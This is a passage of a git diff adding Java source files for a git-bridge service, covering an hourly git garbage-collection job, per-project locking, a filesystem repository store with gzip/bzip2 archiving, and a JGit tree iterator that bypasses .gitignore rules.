@Override + public String getSQL() { + return UPDATE_SWAP; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setTimestamp(1, now); + 
statement.setString(2, compression); + statement.setString(3, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJob.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJob.java new file mode 100644 index 0000000..60edc7a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJob.java @@ -0,0 +1,29 @@ +package uk.ac.ic.wlgitbridge.bridge.gc; + +import java.util.concurrent.CompletableFuture; + +/* + * Is started by the bridge. Every time a project is updated, we queue it for + * GC which executes every hour or so. + * + * We don't queue it into a more immediate Executor because there is no way to + * know if a call to {@link Bridge#updateProject(Optional, ProjectRepo)}, + * which releases the lock, is going to call + * {@link Bridge#push(Optional, String, RawDirectory, RawDirectory, String)}. + * + * We don't want the GC to run in between an update and a push. + */ +public interface GcJob { + + void start(); + + void stop(); + + void onPreGc(Runnable preGc); + + void onPostGc(Runnable postGc); + + void queueForGc(String projectName); + + CompletableFuture<Void> waitForRun(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJobImpl.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJobImpl.java new file mode 100644 index 0000000..6ccf1dd --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJobImpl.java @@ -0,0 +1,130 @@ +package uk.ac.ic.wlgitbridge.bridge.gc; + +import java.io.IOException; +import java.util.*; +import java.util.concurrent.CompletableFuture; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.atomic.AtomicReference; +import java.util.concurrent.locks.Lock; +import java.util.concurrent.locks.ReentrantLock; +import uk.ac.ic.wlgitbridge.bridge.lock.LockGuard; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.ProjectRepo; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.TimerUtils; + +/* + * Implementation of {@link GcJob} using its own Timer and a synchronized + * queue. + */ +public class GcJobImpl implements GcJob { + + private final RepoStore repoStore; + private final ProjectLock locks; + + private final long intervalMs; + private final Timer timer; + + private final Set<String> gcQueue; + + /* + * Hooks in case they are needed, e.g. for testing. 
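+   *
+   * e.g. in a test (sketch only; preGcRan here is a flag owned by the test):
+   * <pre>{@code
+   * AtomicBoolean preGcRan = new AtomicBoolean();
+   * gcJob.onPreGc(() -> preGcRan.set(true));
+   * }</pre>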
+ */ + private AtomicReference<Runnable> preGc; + private AtomicReference<Runnable> postGc; + + /* We need to iterate over and empty it after every run */ + private final Lock jobWaitersLock; + private final List<CompletableFuture<Void>> jobWaiters; + + public GcJobImpl(RepoStore repoStore, ProjectLock locks, long intervalMs) { + this.repoStore = repoStore; + this.locks = locks; + this.intervalMs = intervalMs; + timer = new Timer(); + gcQueue = Collections.newSetFromMap(new ConcurrentHashMap<>()); + preGc = new AtomicReference<>(() -> {}); + postGc = new AtomicReference<>(() -> {}); + jobWaitersLock = new ReentrantLock(); + jobWaiters = new ArrayList<>(); + } + + public GcJobImpl(RepoStore repoStore, ProjectLock locks) { + this(repoStore, locks, TimeUnit.MILLISECONDS.convert(1, TimeUnit.HOURS)); + } + + @Override + public void start() { + Log.info("Starting GC job to run every [{}] ms", intervalMs); + timer.scheduleAtFixedRate(TimerUtils.makeTimerTask(this::doGC), intervalMs, intervalMs); + } + + @Override + public void stop() { + Log.info("Stopping GC job"); + timer.cancel(); + } + + @Override + public void onPreGc(Runnable preGc) { + this.preGc.set(preGc); + } + + @Override + public void onPostGc(Runnable postGc) { + this.postGc.set(postGc); + } + + /* + * Needs to be callable from any thread. + * @param projectName + */ + @Override + public void queueForGc(String projectName) { + gcQueue.add(projectName); + } + + @Override + public CompletableFuture<Void> waitForRun() { + CompletableFuture<Void> ret = new CompletableFuture<>(); + jobWaitersLock.lock(); + try { + jobWaiters.add(ret); + } finally { + jobWaitersLock.unlock(); + } + return ret; + } + + private void doGC() { + Log.info("GC job running"); + int numGcs = 0; + preGc.get().run(); + for (Iterator<String> it = gcQueue.iterator(); it.hasNext(); it.remove(), ++numGcs) { + String proj = it.next(); + Log.debug("[{}] Running GC job on project", proj); + try (LockGuard __ = locks.lockGuard(proj)) { + try { + ProjectRepo repo = repoStore.getExistingRepo(proj); + repo.runGC(); + repo.deleteIncomingPacks(); + } catch (IOException e) { + Log.warn("[{}] Failed to GC project", proj); + } + } catch (CannotAcquireLockException e) { + Log.warn("[{}] Cannot acquire project lock, skipping GC", proj); + } + } + Log.info("GC job finished, num gcs: {}", numGcs); + jobWaitersLock.lock(); + try { + jobWaiters.forEach(w -> w.complete(null)); + } finally { + jobWaitersLock.unlock(); + } + postGc.get().run(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/lock/LockGuard.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/lock/LockGuard.java new file mode 100644 index 0000000..9fc761a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/lock/LockGuard.java @@ -0,0 +1,9 @@ +package uk.ac.ic.wlgitbridge.bridge.lock; + +/* + * Created by winston on 24/08/2016. + */ +public interface LockGuard extends AutoCloseable { + + void close(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/lock/ProjectLock.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/lock/ProjectLock.java new file mode 100644 index 0000000..e23c23c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/lock/ProjectLock.java @@ -0,0 +1,24 @@ +package uk.ac.ic.wlgitbridge.bridge.lock; + +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; + +/* + * Project Lock class. + * + * The locks should be re-entrant. 
For example, we are usually holding the lock + * when a project must be restored, which tries to acquire the lock again. + */ +public interface ProjectLock { + + void lockAll(); + + void lockForProject(String projectName) throws CannotAcquireLockException; + + void unlockForProject(String projectName); + + /* RAII hahaha */ + default LockGuard lockGuard(String projectName) throws CannotAcquireLockException { + lockForProject(projectName); + return () -> unlockForProject(projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStore.java new file mode 100644 index 0000000..d774f30 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStore.java @@ -0,0 +1,164 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import static uk.ac.ic.wlgitbridge.util.Util.deleteInDirectoryApartFrom; + +import com.google.api.client.repackaged.com.google.common.base.Preconditions; +import java.io.File; +import java.io.IOException; +import java.io.InputStream; +import java.nio.file.Paths; +import java.util.ArrayList; +import java.util.Collection; +import java.util.List; +import java.util.Optional; +import java.util.function.Function; +import org.apache.commons.io.FileUtils; +import org.eclipse.jgit.lib.ObjectId; +import org.eclipse.jgit.lib.Repository; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Project; +import uk.ac.ic.wlgitbridge.util.Tar; + +/* + * Created by winston on 20/08/2016. + */ +public class FSGitRepoStore implements RepoStore { + + private static final long DEFAULT_MAX_FILE_SIZE = 50 * 1024 * 1024; + + private final String repoStorePath; + + private final File rootDirectory; + + private final long maxFileSize; + + private final Function<File, Long> fsSizer; + + public FSGitRepoStore(String repoStorePath, Optional<Long> maxFileSize) { + this( + repoStorePath, + maxFileSize.orElse(DEFAULT_MAX_FILE_SIZE), + d -> d.getTotalSpace() - d.getFreeSpace()); + } + + public FSGitRepoStore(String repoStorePath, long maxFileSize, Function<File, Long> fsSizer) { + this.repoStorePath = repoStorePath; + rootDirectory = initRootGitDirectory(repoStorePath); + this.maxFileSize = maxFileSize; + this.fsSizer = fsSizer; + } + + @Override + public String getRepoStorePath() { + return repoStorePath; + } + + @Override + public File getRootDirectory() { + return rootDirectory; + } + + @Override + public ProjectRepo initRepo(String project) throws IOException { + GitProjectRepo ret = GitProjectRepo.fromName(project); + ret.initRepo(this); + return new WalkOverrideGitRepo(ret, Optional.of(maxFileSize), Optional.empty()); + } + + @Override + public ProjectRepo getExistingRepo(String project) throws IOException { + GitProjectRepo ret = GitProjectRepo.fromName(project); + ret.useExistingRepository(this); + return new WalkOverrideGitRepo(ret, Optional.of(maxFileSize), Optional.empty()); + } + + @Override + public ProjectRepo useJGitRepo(Repository repo, ObjectId commitId) { + GitProjectRepo ret = GitProjectRepo.fromJGitRepo(repo); + return new WalkOverrideGitRepo(ret, Optional.of(maxFileSize), Optional.of(commitId)); + } + + /* TODO: Perhaps we should just delete bad directories on the fly. 
*/ + @Override + public void purgeNonexistentProjects(Collection<String> existingProjectNames) { + List<String> excludedFromDeletion = new ArrayList<>(existingProjectNames); + excludedFromDeletion.add(".wlgb"); + deleteInDirectoryApartFrom(rootDirectory, excludedFromDeletion.toArray(new String[] {})); + } + + @Override + public long totalSize() { + return fsSizer.apply(rootDirectory); + } + + @Override + public InputStream bzip2Project(String projectName, long[] sizePtr) throws IOException { + Project.checkValidProjectName(projectName); + Log.debug("[{}] bzip2 project", projectName); + return Tar.bz2.zip(getDotGitForProject(projectName), sizePtr); + } + + @Override + public InputStream gzipProject(String projectName, long[] sizePtr) throws IOException { + Project.checkValidProjectName(projectName); + Log.debug("[{}] gzip project", projectName); + return Tar.gzip.zip(getDotGitForProject(projectName), sizePtr); + } + + @Override + public void gcProject(String projectName) throws IOException { + Project.checkValidProjectName(projectName); + ProjectRepo repo = getExistingRepo(projectName); + repo.runGC(); + } + + @Override + public void remove(String projectName) throws IOException { + Project.checkValidProjectName(projectName); + FileUtils.deleteDirectory(new File(rootDirectory, projectName)); + } + + @Override + public void unbzip2Project(String projectName, InputStream dataStream) throws IOException { + Preconditions.checkArgument( + Project.isValidProjectName(projectName), "[%s] invalid project name: ", projectName); + Preconditions.checkState( + getDirForProject(projectName).mkdirs(), + "[%s] directories for " + "evicted project already exist", + projectName); + Log.debug("[{}] un-bzip2 project", projectName); + Tar.bz2.unzip(dataStream, getDirForProject(projectName)); + } + + @Override + public void ungzipProject(String projectName, InputStream dataStream) throws IOException { + Preconditions.checkArgument( + Project.isValidProjectName(projectName), "[%s] invalid project name: ", projectName); + Preconditions.checkState( + getDirForProject(projectName).mkdirs(), + "[%s] directories for " + "evicted project already exist", + projectName); + Log.debug("[{}] un-gzip project", projectName); + Tar.gzip.unzip(dataStream, getDirForProject(projectName)); + } + + private File getDirForProject(String projectName) { + Project.checkValidProjectName(projectName); + return Paths.get(rootDirectory.getAbsolutePath()).resolve(projectName).toFile(); + } + + private File getDotGitForProject(String projectName) { + Project.checkValidProjectName(projectName); + return Paths.get(rootDirectory.getAbsolutePath()).resolve(projectName).resolve(".git").toFile(); + } + + private File initRootGitDirectory(String rootGitDirectoryPath) { + File rootGitDirectory = new File(rootGitDirectoryPath); + rootGitDirectory.mkdirs(); + Preconditions.checkArgument( + rootGitDirectory.isDirectory(), + "given root git directory " + "is not a directory: %s", + rootGitDirectory.getAbsolutePath()); + return rootGitDirectory; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepo.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepo.java new file mode 100644 index 0000000..86754f8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepo.java @@ -0,0 +1,231 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import com.google.common.base.Preconditions; +import java.io.File; +import java.io.IOException; +import 
java.nio.charset.StandardCharsets; +import java.nio.file.FileVisitResult; +import java.nio.file.FileVisitor; +import java.nio.file.Files; +import java.nio.file.Path; +import java.nio.file.attribute.BasicFileAttributes; +import java.util.*; +import org.apache.commons.io.IOUtils; +import org.eclipse.jgit.api.Git; +import org.eclipse.jgit.api.ResetCommand; +import org.eclipse.jgit.api.errors.GitAPIException; +import org.eclipse.jgit.lib.PersonIdent; +import org.eclipse.jgit.lib.Repository; +import org.eclipse.jgit.storage.file.FileRepositoryBuilder; +import uk.ac.ic.wlgitbridge.data.filestore.GitDirectoryContents; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.git.util.RepositoryObjectTreeWalker; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Project; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Class representing a Git repository. + * + * It stores the projectName and repo separately because the hooks need to be + * able to construct one of these without knowing whether the repo exists yet. + * + * It can then be passed to the Bridge, which will either + * {@link #initRepo(RepoStore)} for a never-seen-before repo, or + * {@link #useExistingRepository(RepoStore)} for an existing repo. + * + * Make sure to acquire the project lock before calling methods here. + */ +public class GitProjectRepo implements ProjectRepo { + + private final String projectName; + private Optional<Repository> repository; + + public static GitProjectRepo fromJGitRepo(Repository repo) { + return new GitProjectRepo(repo.getWorkTree().getName(), Optional.of(repo)); + } + + public static GitProjectRepo fromName(String projectName) { + return new GitProjectRepo(projectName, Optional.empty()); + } + + GitProjectRepo(String projectName, Optional<Repository> repository) { + Preconditions.checkArgument(Project.isValidProjectName(projectName)); + this.projectName = projectName; + this.repository = repository; + } + + @Override + public String getProjectName() { + return projectName; + } + + @Override + public void initRepo(RepoStore repoStore) throws IOException { + initRepositoryField(repoStore); + Preconditions.checkState(repository.isPresent()); + Repository repo = this.repository.get(); + // TODO: assert that this is a fresh repo. 
At the moment, we can't be + // sure whether the repo to be init'd doesn't exist or is just fresh + // and we crashed / aborted while committing + if (repo.getObjectDatabase().exists()) return; + repo.create(); + } + + @Override + public void useExistingRepository(RepoStore repoStore) throws IOException { + initRepositoryField(repoStore); + Preconditions.checkState(repository.isPresent()); + Preconditions.checkState(repository.get().getObjectDatabase().exists()); + } + + @Override + public RawDirectory getDirectory() throws IOException, GitUserException { + Preconditions.checkState(repository.isPresent()); + return new RepositoryObjectTreeWalker(repository.get()).getDirectoryContents(Optional.empty()); + } + + @Override + public Collection<String> commitAndGetMissing(GitDirectoryContents contents) throws IOException { + try { + return doCommitAndGetMissing(contents); + } catch (GitAPIException e) { + throw new IOException(e); + } + } + + @Override + public void runGC() throws IOException { + Preconditions.checkState(repository.isPresent(), "Repo is not present"); + File dir = getProjectDir(); + Preconditions.checkState(dir.isDirectory()); + Log.debug("[{}] Running git gc", projectName); + Process proc = new ProcessBuilder("git", "gc").directory(dir).start(); + int exitCode; + try { + exitCode = proc.waitFor(); + Log.debug("Exit: {}", exitCode); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + if (exitCode != 0) { + Log.warn("[{}] Git gc failed", dir.getAbsolutePath()); + Log.warn(IOUtils.toString(proc.getInputStream(), StandardCharsets.UTF_8)); + Log.warn(IOUtils.toString(proc.getErrorStream(), StandardCharsets.UTF_8)); + throw new IOException("git gc error"); + } + Log.debug("[{}] git gc successful", projectName); + } + + @Override + public void deleteIncomingPacks() throws IOException { + Log.debug("[{}] Checking for garbage `incoming` files", projectName); + Files.walkFileTree( + getDotGitDir().toPath(), + new FileVisitor<Path>() { + @Override + public FileVisitResult preVisitDirectory(Path dir, BasicFileAttributes attrs) + throws IOException { + return FileVisitResult.CONTINUE; + } + + @Override + public FileVisitResult visitFile(Path file, BasicFileAttributes attrs) + throws IOException { + File file_ = file.toFile(); + String name = file_.getName(); + if (name.startsWith("incoming_") && name.endsWith(".pack")) { + Log.debug("Deleting garbage `incoming` file: {}", file_); + Preconditions.checkState(file_.delete()); + } + return FileVisitResult.CONTINUE; + } + + @Override + public FileVisitResult visitFileFailed(Path file, IOException exc) throws IOException { + Preconditions.checkNotNull(file); + Preconditions.checkNotNull(exc); + Log.warn("Failed to visit file: " + file, exc); + return FileVisitResult.TERMINATE; + } + + @Override + public FileVisitResult postVisitDirectory(Path dir, IOException exc) throws IOException { + Preconditions.checkNotNull(dir); + if (exc != null) { + return FileVisitResult.TERMINATE; + } + return FileVisitResult.CONTINUE; + } + }); + } + + @Override + public File getProjectDir() { + return getJGitRepository().getDirectory().getParentFile(); + } + + public void resetHard() throws IOException { + Git git = new Git(getJGitRepository()); + try { + git.reset().setMode(ResetCommand.ResetType.HARD).call(); + } catch (GitAPIException e) { + throw new IOException(e); + } + } + + @Override + public Repository getJGitRepository() { + return repository.get(); + } + + public File getDotGitDir() { + return getJGitRepository().getWorkTree(); + } 
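+  // A minimal usage sketch (annotation, not part of the original class;
+  // `repoStore` and `lock` are assumed to come from the bridge's setup code):
+  //
+  //   lock.lockForProject("abc123");             // always take the project lock first
+  //   try {
+  //     GitProjectRepo repo = GitProjectRepo.fromName("abc123");
+  //     repo.useExistingRepository(repoStore);   // or initRepo(repoStore) for a new repo
+  //     RawDirectory contents = repo.getDirectory();
+  //   } finally {
+  //     lock.unlockForProject("abc123");
+  //   }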
+ + private void initRepositoryField(RepoStore repoStore) throws IOException { + Preconditions.checkNotNull(repoStore); + Preconditions.checkArgument(Project.isValidProjectName(projectName)); + Preconditions.checkState(!repository.isPresent()); + repository = Optional.of(createJGitRepository(repoStore, projectName)); + } + + private Repository createJGitRepository(RepoStore repoStore, String projName) throws IOException { + File repoDir = new File(repoStore.getRootDirectory(), projName); + return new FileRepositoryBuilder().setWorkTree(repoDir).build(); + } + + private Collection<String> doCommitAndGetMissing(GitDirectoryContents contents) + throws IOException, GitAPIException { + Preconditions.checkState(repository.isPresent()); + Repository repo = getJGitRepository(); + resetHard(); + String name = getProjectName(); + Log.debug("[{}] Writing commit", name); + contents.write(); + Git git = new Git(getJGitRepository()); + Log.debug("[{}] Getting missing files", name); + Set<String> missingFiles = git.status().call().getMissing(); + for (String missing : missingFiles) { + Log.debug("[{}] Git rm {}", name, missing); + git.rm().setCached(true).addFilepattern(missing).call(); + } + Log.debug("[{}] Calling Git add", name); + git.add().setWorkingTreeIterator(new NoGitignoreIterator(repo)).addFilepattern(".").call(); + Log.debug("[{}] Calling Git commit", name); + git.commit() + .setAuthor( + new PersonIdent( + contents.getUserName(), + contents.getUserEmail(), + contents.getWhen(), + TimeZone.getDefault())) + .setMessage(contents.getCommitMessage()) + .call(); + Log.debug( + "[{}] Deleting files in directory: {}", name, contents.getDirectory().getAbsolutePath()); + Util.deleteInDirectoryApartFrom(contents.getDirectory(), ".git"); + return missingFiles; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/NoGitignoreIterator.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/NoGitignoreIterator.java new file mode 100644 index 0000000..437fdc1 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/NoGitignoreIterator.java @@ -0,0 +1,73 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import java.io.File; +import java.lang.reflect.Field; +import org.eclipse.jgit.lib.Repository; +import org.eclipse.jgit.treewalk.AbstractTreeIterator; +import org.eclipse.jgit.treewalk.FileTreeIterator; +import org.eclipse.jgit.treewalk.WorkingTreeIterator; +import org.eclipse.jgit.treewalk.WorkingTreeOptions; +import org.eclipse.jgit.util.FS; + +/* + * Created by winston on 08/10/2016. 
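+ *
+ * (Annotation, not part of the original comment.) How it works: init() uses
+ * reflection to null out WorkingTreeIterator's private `ignoreNode` field, and
+ * enterSubtree() recurses with this same class, so .gitignore rules are
+ * skipped at every directory level when staging files.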
+ */ +public class NoGitignoreIterator extends FileTreeIterator { + + private static final Field ignoreNodeField; + + static { + try { + ignoreNodeField = WorkingTreeIterator.class.getDeclaredField("ignoreNode"); + } catch (NoSuchFieldException e) { + throw new RuntimeException(e); + } + ignoreNodeField.setAccessible(true); + } + + public NoGitignoreIterator(Repository repo) { + super(repo); + } + + public NoGitignoreIterator(Repository repo, FileModeStrategy fileModeStrategy) { + super(repo, fileModeStrategy); + } + + public NoGitignoreIterator(File root, FS fs, WorkingTreeOptions options) { + super(root, fs, options); + } + + public NoGitignoreIterator( + File root, FS fs, WorkingTreeOptions options, FileModeStrategy fileModeStrategy) { + super(root, fs, options, fileModeStrategy); + } + + protected NoGitignoreIterator(FileTreeIterator p, File root, FS fs) { + super(p, root, fs); + } + + protected NoGitignoreIterator( + WorkingTreeIterator p, File root, FS fs, FileModeStrategy fileModeStrategy) { + super(p, root, fs, fileModeStrategy); + } + + // Note: the `list` is a list of top-level entities in this directory, + // not a full list of files in the tree. + @Override + protected void init(Entry[] list) { + super.init(list); + try { + ignoreNodeField.set(this, null); + } catch (IllegalAccessException e) { + throw new RuntimeException(e); + } + } + + // When entering a sub-directory, create a new instance of this class, + // so we can also ignore gitignore specifications in sub-directories + @Override + protected AbstractTreeIterator enterSubtree() { + String fullPath = getDirectory().getAbsolutePath() + "/" + current().getName(); + return new NoGitignoreIterator(this, new File(fullPath), fs, fileModeStrategy); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/ProjectRepo.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/ProjectRepo.java new file mode 100644 index 0000000..5d82e3d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/ProjectRepo.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import java.io.File; +import java.io.IOException; +import java.util.Collection; +import org.eclipse.jgit.lib.Repository; +import uk.ac.ic.wlgitbridge.data.filestore.GitDirectoryContents; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; + +/* + * Created by winston on 20/08/2016. 
+ */
+public interface ProjectRepo {
+
+  String getProjectName();
+
+  void initRepo(RepoStore repoStore) throws IOException;
+
+  void useExistingRepository(RepoStore repoStore) throws IOException;
+
+  RawDirectory getDirectory() throws IOException, GitUserException;
+
+  Collection<String> commitAndGetMissing(GitDirectoryContents gitDirectoryContents)
+      throws IOException, GitUserException;
+
+  void runGC() throws IOException;
+
+  void deleteIncomingPacks() throws IOException;
+
+  File getProjectDir();
+
+  Repository getJGitRepository();
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/RepoStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/RepoStore.java
new file mode 100644
index 0000000..63ee3d1
--- /dev/null
+++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/RepoStore.java
@@ -0,0 +1,82 @@
+package uk.ac.ic.wlgitbridge.bridge.repo;
+
+import java.io.File;
+import java.io.IOException;
+import java.io.InputStream;
+import java.util.Collection;
+import org.eclipse.jgit.lib.ObjectId;
+import org.eclipse.jgit.lib.Repository;
+
+/*
+ * Created by winston on 20/08/2016.
+ */
+public interface RepoStore {
+
+  /* Still need to get rid of these two methods.
+  Main dependency: GitRepoStore needs a Repository which needs a directory.
+  Instead, use a visitor or something. */
+  String getRepoStorePath();
+
+  File getRootDirectory();
+
+  ProjectRepo initRepo(String project) throws IOException;
+
+  ProjectRepo getExistingRepo(String project) throws IOException;
+
+  ProjectRepo useJGitRepo(Repository repo, ObjectId commitId);
+
+  void purgeNonexistentProjects(Collection<String> existingProjectNames);
+
+  long totalSize();
+
+  /*
+   * Tars and bzip2s the .git directory of the given project. Throws an
+   * IOException if the project doesn't exist. The returned stream is a copy
+   * of the original .git directory, which must be deleted using remove().
+   */
+  InputStream bzip2Project(String projectName, long[] sizePtr) throws IOException;
+
+  default InputStream bzip2Project(String projectName) throws IOException {
+    return bzip2Project(projectName, null);
+  }
+
+  /*
+   * Tars and gzips the .git directory of the given project. Throws an
+   * IOException if the project doesn't exist. The returned stream is a copy
+   * of the original .git directory, which must be deleted using remove().
+   */
+  InputStream gzipProject(String projectName, long[] sizePtr) throws IOException;
+
+  default InputStream gzipProject(String projectName) throws IOException {
+    return gzipProject(projectName, null);
+  }
+
+  void gcProject(String projectName) throws IOException;
+
+  /*
+   * Called after {@link #bzip2Project(String, long[])}'s output has been
+   * safely uploaded to the swap store. Removes all traces of the project from
+   * disk, i.e. not just its .git, but the whole project's git directory.
+   * @param projectName
+   * @throws IOException
+   */
+  void remove(String projectName) throws IOException;
+
+  /*
+   * Unbzip2s the given data stream into a .git directory for projectName.
+   * Creates the project's git directory.
+ * If projectName already exists, throws an IOException. + * @param projectName the name of the project, e.g. abc123 + * @param dataStream the data stream containing the gzip contents. + */ + void ungzipProject(String projectName, InputStream dataStream) throws IOException; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/RepoStoreConfig.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/RepoStoreConfig.java new file mode 100644 index 0000000..feb01d3 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/RepoStoreConfig.java @@ -0,0 +1,27 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import java.util.Optional; +import javax.annotation.Nullable; + +/* + * Created by winston on 02/07/2017. + */ +public class RepoStoreConfig { + + @Nullable private final Long maxFileSize; + + @Nullable private final Long maxFileNum; + + public RepoStoreConfig(Long maxFileSize, Long maxFileNum) { + this.maxFileSize = maxFileSize; + this.maxFileNum = maxFileNum; + } + + public Optional<Long> getMaxFileSize() { + return Optional.ofNullable(maxFileSize); + } + + public Optional<Long> getMaxFileNum() { + return Optional.ofNullable(maxFileNum); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/WalkOverrideGitRepo.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/WalkOverrideGitRepo.java new file mode 100644 index 0000000..ded4269 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/WalkOverrideGitRepo.java @@ -0,0 +1,89 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import java.io.File; +import java.io.IOException; +import java.util.Collection; +import java.util.Optional; +import org.eclipse.jgit.lib.ObjectId; +import org.eclipse.jgit.lib.Repository; +import uk.ac.ic.wlgitbridge.data.filestore.GitDirectoryContents; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.git.util.RepositoryObjectTreeWalker; + +/* + * This class takes a GitProjectRepo and delegates all calls to it. + * + * The purpose is to insert a file size check in {@link #getDirectory()}. + * + * We delegate instead of subclass because we can't override the static + * constructors in {@link GitProjectRepo}. 
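+ *
+ * Construction sketch (annotation, not part of the original comment),
+ * mirroring how FSGitRepoStore#initRepo wraps the underlying repo:
+ *
+ *   GitProjectRepo gitRepo = GitProjectRepo.fromName(project);
+ *   gitRepo.initRepo(repoStore);
+ *   ProjectRepo repo =
+ *       new WalkOverrideGitRepo(gitRepo, Optional.of(maxFileSize), Optional.empty());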
+ */ +public class WalkOverrideGitRepo implements ProjectRepo { + + private final GitProjectRepo gitRepo; + + private final Optional<Long> maxFileSize; + + private final Optional<ObjectId> commitId; + + public WalkOverrideGitRepo( + GitProjectRepo gitRepo, Optional<Long> maxFileSize, Optional<ObjectId> commitId) { + this.gitRepo = gitRepo; + this.maxFileSize = maxFileSize; + this.commitId = commitId; + } + + @Override + public String getProjectName() { + return gitRepo.getProjectName(); + } + + @Override + public void initRepo(RepoStore repoStore) throws IOException { + gitRepo.initRepo(repoStore); + } + + @Override + public void useExistingRepository(RepoStore repoStore) throws IOException { + gitRepo.useExistingRepository(repoStore); + } + + @Override + public RawDirectory getDirectory() throws IOException, GitUserException { + Repository repo = gitRepo.getJGitRepository(); + RepositoryObjectTreeWalker walker; + if (commitId.isPresent()) { + walker = new RepositoryObjectTreeWalker(repo, commitId.get()); + } else { + walker = new RepositoryObjectTreeWalker(repo); + } + return walker.getDirectoryContents(maxFileSize); + } + + @Override + public Collection<String> commitAndGetMissing(GitDirectoryContents gitDirectoryContents) + throws GitUserException, IOException { + return gitRepo.commitAndGetMissing(gitDirectoryContents); + } + + @Override + public void runGC() throws IOException { + gitRepo.runGC(); + } + + @Override + public void deleteIncomingPacks() throws IOException { + gitRepo.deleteIncomingPacks(); + } + + @Override + public File getProjectDir() { + return gitRepo.getProjectDir(); + } + + @Override + public Repository getJGitRepository() { + return gitRepo.getJGitRepository(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/resource/ResourceCache.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/resource/ResourceCache.java new file mode 100644 index 0000000..3bf568f --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/resource/ResourceCache.java @@ -0,0 +1,22 @@ +package uk.ac.ic.wlgitbridge.bridge.resource; + +import java.io.IOException; +import java.util.Map; +import java.util.Optional; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.git.exception.SizeLimitExceededException; + +/* + * Created by winston on 20/08/2016. 
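+ *
+ * Illustrative call (annotation, not part of the original comment; the names
+ * are placeholders; callers pass in the current file table and the URLs
+ * already fetched during this snapshot):
+ *
+ *   RawFile file =
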